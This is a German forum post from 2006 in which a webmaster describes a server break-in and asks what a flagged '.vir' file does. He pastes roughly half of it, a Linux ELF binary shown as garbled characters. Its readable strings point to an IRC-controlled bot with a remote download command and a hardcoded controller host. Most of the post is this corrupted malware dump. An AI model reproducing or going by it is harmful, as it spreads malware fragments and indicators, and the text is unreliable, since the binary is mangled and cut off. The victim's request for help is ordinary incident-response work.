| Mad-Line | 03.10.2006 23:21 |
Nach Server Hack komische dateien ...
Hallo
ich bin auf der suche nach informationen.
unser web server wurde vor einer woche gehackt durch eine sicherheits lcke in einem script. der hacker konnte mit hilfe des scripts die startseite ndern und wohl auch auf andere daten zugreifen. das script wrde von mir so verndert das bei einem versuch auf die besagte datei umgeleitet wird auf meine hacker willkommens seite. :D
ein tag spter hatten wir ber 14 000 zugriffe auf die seite.
beim genauen durch stbern und rcksichern ist mir eine datei auf gefallen mit der endung .vir mein viren killer hat sie als schdling erkannt aber konnte mir leider keine weitern informationen geben.
was bewirkt nun diese datei?
was ist das fr eine sprache? Zitat:
ELF��� � � � � s��4 | 4 � ( ! � � 4 4��4�� � � � �� ������� � � � � �� ��sb sb � � � b ����� p � � � c ���� � � � (� (��(�� � � Qtd � � /lib/ld-linux.so.2 � � � GNU � � % : % 6 " � � 8 � 5 2 � 1 # � � - 7 � 9 * & � ' � ) , 3 . � � �
� � � � � � � � � � � ! � ( $ � + � / � �
4 0 Y * � � � C � y m � ^ � � � W � | � P� q � �� Z � r & � � � b� 9 � x � � �� 9 � ~ � � 4� � � x � 9 � 5 | � <� � � e J� � � � � 5� � � V� � * � �� =� � � � � ^ � 0 � 9 � k F � O� � � .� ^ � A� � � �� � s� � ~� * � � � = < � \� � � '� R � Q x � � x� 6 � � ��� � � � �� � : � L x � D 4 � 9 � � /� � � � . 0 � _Jv_RegisterClasses __gmon_start__ libc.so.6 strcpy waitpid ioctl vsprintf recv connect atol getpid fgets memcpy pclose feof malloc sleep socket select popen accept write kill strcat bind inet_addr ntohl setsockopt strncmp strncpy strcasecmp sendto bcopy strtok listen fork inet_network strdup memset srand getppid time gethostbyname fclose fputc htons __errno_location exit fopen atoi _IO_stdin_used __libc_start_main strlen toupper free GLIBC_2.1 GLIBC_2.0 � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � $ � �ii
� � � �ii
� � D���8 l���� p���� t���� x���� |���� ���� ���� ���� ��� ���
���� ���� ���
���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ���� ��� ���! ���" ���# ���$ ���% ���& ����' ����( ����) ����* ����+ ����, ����- ���. $���/ (���1 ,���2 0���3 4���4 8���5 <���7 @���9 U�� �� 6 5d��%h�� %l��h %p��h� %t��h� %x��h� %|��h %��h( %��h0 %��h8 p%��h@ `%��hH P%��hP @%��hX 0%��h` % ��hh �%��hp %��hx %��h %��h %��h %��h %��h %��h %��h %��h p%��h `%��h P%��h @%��h 0%��h %��h �%��h %��h %��h � %��h�� %��h�� %��h�� %��h � % ��h(� %���h0� %���h8� p%���h@� `%���hH� P%���hP� @%���hX� 0%���h`� % ��hh� �%$��hp� %(��hx� %,��h� %0��h� %4��h� %8��h� %<��h � %@��h� 1^PTRh ��h��QVh ��KUS [�V P t�Ћ]ÐU�=`�� u-���t� ���ҡ���u�`���ÉU�\��t! t��$\��,q ]US$E�� E}*t*}*�} t� }?td E�� E E E�D$�E�@�$t(E�8 t�E�@D$�E��$u��E� EE E E�8 t�E�@D$�E�@�$Lu��E� EEPE E�� �$ËE�� �$9u�E�@D$�E�@�$u��E� EEE$[]U�E�EED$�E�D$��$ ���$ ��D$�D$� ��E��$US$=���u(E�D$�D$�������$E� E} u�EE ��������$�EE ��H9Er�)E� ME� ������E ʡ����EPE����$!E��EEE$[]U�=�� u
E?=���u����$kE$ 5������@�$EEEU�E��$�E�H8
t�E��$w�E�H8
t��E��$a�E�H US4� �gfff�)��)ȃ�EE@�$EE@D$�D$� E�$:D$�-���$/��VE} uPE E;E|��� E]�ON��)�����)�A�E XQ�ȸ{Qø�
��)iZ )@EE E;E|�$ED$�D$� � �$�E D$� � D$� �$CED$�D$� � �$�$;ED$�D$�E�$\E�$aE4� []UW� D$� D$�� �$� ?E}u�X� fE� �$q fEE D$�� D$� Eȃ��$vD$�� EȉD$�E�$u�� D$�� E�$u�� u�� E� ED$�ED$�E�$'E}u��$ 8ȉ,(E�E��8Dž4< Dž0< 0D$�D$� D$� 8D$�E@�$dy��$ �E�E��8��RD$� D$� � D$�E�$~E} ~�}����$ �E �E8
t��E8
t���E �E8
t��E8
t���E ��D$�D$�D$�?��E�$�E�$0E�$%�$ � _]U�}� u E� (}��u�E�E�E�HD$�E��$�E�EEU�E�EU�UE fE }���E� �EE�m�}�u�U��E�E�EU��E�UE��EEfE�EUh� E��$ht�'� }��&E�D$�D$�`��E��$�$ D$� D$�� �$� E}u&E�D$�D$� ��E��$�$ E��D$�� D$��� �$u�E�� �D$��$b�E�� D$��$FE �$Q9Es��E8/u��E ֍�E fE� �$P GfEڍ�$EEԋEԃuo�$ u&E�D$�D$���E��$�$ @�D$�@� D$�E��$-�EԉED$�� D$� E��$D$�� E؉D$�E�$t&E�D$�D$� ��E��$ �$ �D$��E@D$�D$�`��E�$E�D$�D$�t��E��$D$���E�� �$6D$� D$� � D$�E�$; � � �� E E;|�똍�ED$�� D$����$Wu8E �E;|�,D$��E� �$2E E 돋E�� D$�E�D$�D$���E��$D$� D$� � D$�E�$I �`� �� Dž ;|�땋D$��� �$r ŋ�$E�$��$ �U8��E������HE=���u<�ED$��ED$��ED$��ED$�E�D$�D$���E��$Z�ED$(�ED$$�ED$ �ED$��ED$��ED$��ED$��ED$�E�D$�D$���E��$/U�E�D$�D$����E��$
U�}��t�E�D$�D$�+��E��$PE�� �$ v�E�D$�D$�`��E��$�E�� D$�D$���E��$U�}��tYE�D$�D$���E��$k=�� t E���E��ED$�E�D$�D$���E��$1 =�� t�E�D$�D$����E��$ E�� �$�= v�E�D$�D$�@��E��$N����D$� � D$� �$���E�� D$��$��D$���E��$U�}��tVE�D$�D$���E��$[=�� t E���E��ED$�E�D$�D$���E��$!~=�� u�E�D$�D$���E��$YE�� D$��$��t�E�D$�D$���E��$!��� E�D$�D$���E��$U(� }��t3E�D$�D$� ��E��$v��� ��� e� E�� �$s�v�E�D$�D$�@��E��$.1� E�� D$��$��$'(.u��$�Ƅ( Dž Dž� �$9r�#�8.u� Ÿ� +Dž ;|� D$����$ Ѝ�$ u����� �D$��$ � �����U�E��$K �� ��ueE��$E} u/E�D$�E�D$�D$� �����$�$ E@�D$�D$� ��E@� �$ ��UST� E �$ SE��$t�s� D$� D$�� �$� y��$� �}��&E�D$�D$���E��$�$� E�� D$�E��$EE�� �$EE�� �$IE䍅Eč�E�D$�� D$�
�$E�� D$�E�D$�D$����E��$(U��$���U��$��@�E@� Ef@��Ef@� E@ �E@�@UċEB�]�E�$'fC�fE� EE̋]f�} t�]�E�$fC��]fC�]D$�� �$fC�]C�]UfC�]D$�� �$fC
E�@�fED$�� EȉD$�D$� D$�� D$��$}1v,�$ U�9r��$ E E T� []UWV0� �$��P �Dž� Dž�� �$ zE��$t�� }��&E�D$�D$���E��$:�$� DD$� D$�� �$� y��$�
Dž �~�&E؉���B� ϋE�� D$�E��$E�� �$EE�� D$�E�D$�D$���E��$c�E$��E�E$��@EE�fE@ E@E�E �E$�� E�E$E؍Eـ Eـ Eـ ߍEـ Eـ Eـ Eـ Eـ��fE}xfE E�� �$��$����E�� �$u�� �(��$fEdfE EċEfE �fE̋�fE/EfE fDžh� �fjEȉlD$�� E�$VfE���E��E��E��EEĉxEȉ|E E�����$fED$�� x�D$�E��$�D$�x D$�E(�$� D$�x�$fED$�� hD$�D$� �(D$�ED$��$�1v2�$ �9r��$ Dž� � 0� ^_]US Dždx� �$ HE��$t�]� }��&E�D$�D$���E��$F�$� PE�� �$PD$� D$�� �$� LL y��$� ��$ 1؉�$dD$�T$�E(�$�E�� D$�E��$ TE�� D$�E�D$�D$� ��E��$jX�E$��E�E$��@EE�d(��$fE�fEfE@ E@E�fE XEċTEfEfEEE�E$��PE�E$E؍Eـ Eـ Eـ ߍEـ��Eـ��Eـ Eـ Eـ fE}xfE fE fDžh� �EfjEȉlD$�� E�$fED$�( E�$�`EĉxEȉ|E E�d���$^fED$�� x�D$�E��$GdD$�x D$�E(�$"d D$�x�$fED$�� hD$�D$� d(D$�ED$�L�$7\1v(�$ RP�H9r��Dž\ \ L�$;�$ � []UhE� �$ $ E�$ EċE��$�t�s� }��&E�D$�D$�@��E��$�$� E�� �$;ED$�� D$� Eȉ�$E�� D$�E��$ZEfE� E�� D$�E�D$�D$�d��E��$!�fED$�� D$�� �$� E} y�]E� ED$�D$�!T E�$�D$�� EȉD$�D$� D$� $ ED$�E�$uE�$}1~��$ U�U9r��E E DE�$�$ dU�}� &E�D$�D$���E��$&�$� 0E�� �$������� E��$�U�E��$(t�� E�D$�D$� ��E��$�$� E�D$�D$� ��E��$�$� E�D$�D$� ��E��$n�$� E�D$�D$� ��E��$H�$� rE�D$�D$�`��E��$"�$� LE�D$�D$���E��$�$� &E�D$�D$� ��E��$�$� E�D$�D$���E��$�$� E�D$�D$���E��$�$� E�D$�D$�`��E��$d�$� E�D$�D$���E��$>�$� hE�D$�D$�@��E��$��$� BE�D$�D$���E��$�$� �E�D$�D$� ��E��$�$� E�D$�D$���E��$E�D$�D$���E��$�$� E�D$�D$�@��E��$f�$� �$ dUVS E E;���r� E� ��<� trE4 ���9�3tX}� t0E� ����D$�E�D$�D$���E��$D$� E� �����$\E _ [^]U�u��u�D$� �$ (�D$����E��$]UWSp� E E��$d9Es�E�E�8 u��E ܋E�E� E�EE�E��EE E��$�9Es�E�E�8!u��E ܋E�E� E8!�G� ��D$�E�$�+� � Dž E E E�$9Es�E�E8 u��E ܋E�E ��D$�E�$�t�� E�E@ED$�� D$����E�$XuB=�� t�E�D$�D$����E��$�E�D$�D$����E��$D$�� D$����E�$��� E��$t��� D$� � D$� �$E�D$�D$� ���$-D$�-���$�$�t�sD$� � D$� �$oD$�D$� � �$D$�E�D$�D$�\��E��$�$� y�$�$ E�$E E;|�1E8 t)E8 u���UE� �E E E E�$X9Er��E�E8 u� E ԍ
~
Dž
EDk��Dž� E8 u� E ;|� E E�$9Es�E�E8 u��E ܋E@�$)DED$�ED$�D�$E�D UE��UDž <�� u� D$�����$uXED$�HD$�E�D$�E��$���E� E;|�#ED�$E ݍ cp� [_]U���D$�D$�m��E��$W��D$���D$�D$�z��E��$2��D$�D$���E��$�U�E�D$�D$���E��$U(E�EE E }�~�GE��$9Es�E8 u��E E ڍE E��$9Eu�� E E E�$9Es�E�E8 u��E ܋E�E ��D$�E�$G�9� =�� �,� E�EE E }�~�GE��$+9Es�E8 u��E E ڍE E��$ 9Eu� E E E�$9Es�E�E8 u��E ܋E�E E�$EEuSE�$jE} u���D$�D$� ��E��$OME@�D$�E@� D$�E�$�E좋���E���E����� ��� � U����$!��U�E E��$9Es�E�E�8!u��E ܋E�E� ��D$�E��$u3E�8:u�E� =�� t
���$ E��$e��UH���E� =�� u�)= ���������� D$�� D$�� �$� ��=�� x֡���$Et����$4t�X���$E} u���� ���$CE؋@�D$�E�D$�E؋@� �$����$EfE� �$�� fEE܉D$�D$�!T ���$s�$ 'E�$ �+E v� v D$�� ED$����$Tt�K8jt� D$� D$� D$�
D$�� ���$D$� D$� D$�� D$�� ���$WD$� D$� D$� D$�� ���$*C8st�8rt���$� V��� ���$**UWS� )�t��$ E� �$D$�D$����E� �$3E� E;E�|�CE� E����$D$�D$� E� E����$E �$ S<1����$����������!�����)����� ��D$���D$���D$�D$�@�����$ XȉLH�������XDžP� DžT PD$�D$� D$� XD$���@�$�?Dž ;���r�0� D$�� D$� � �����$� @LL;���r�3L�����HL� �����L 뽋L������
�������$�HDžL L;���r�5L� HL� ������L 뻡���$8H�� �������X���D$� D$� � HD$����$dDD �H�D D$�i��H�$�HH �H8 u�H�$H8:� DžD H�$39Ds�D�H8 u�
D ͋D�H H@D$�8�$D�H@D$�H�$�D$�k��8�$DžD H�$9Ds�D�H8 u�
D ͋D�H HD$�8�$+D�H@D$�H�$�DžD D<@�� u�X8DD$��@���$u+DHD$�8D$����$�D��ЍD 떍8D$�m���$u�{D$�i���$ �HUWV1S� Ð# ��)�9s�& ' �F9r�[^_]Í U��$B 2# t$���)�pu�[ �$t$�]�Nu�$ÐUS�L��L��t�v ' �Ћ�uX[]US [ç" R] � � � vps.cia.net.ve NOTICE %s :Unable to comply.
r /usr/dict/words %s : USERID : UNIX : %s
NOTICE %s :GET <host> <save as>
NOTICE %s :Unable to create socket.
http:// NOTICE %s :Unable to resolve address.
NOTICE %s :Unable to connect to http.
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
| ich habs um die hlfte gekurzt. | 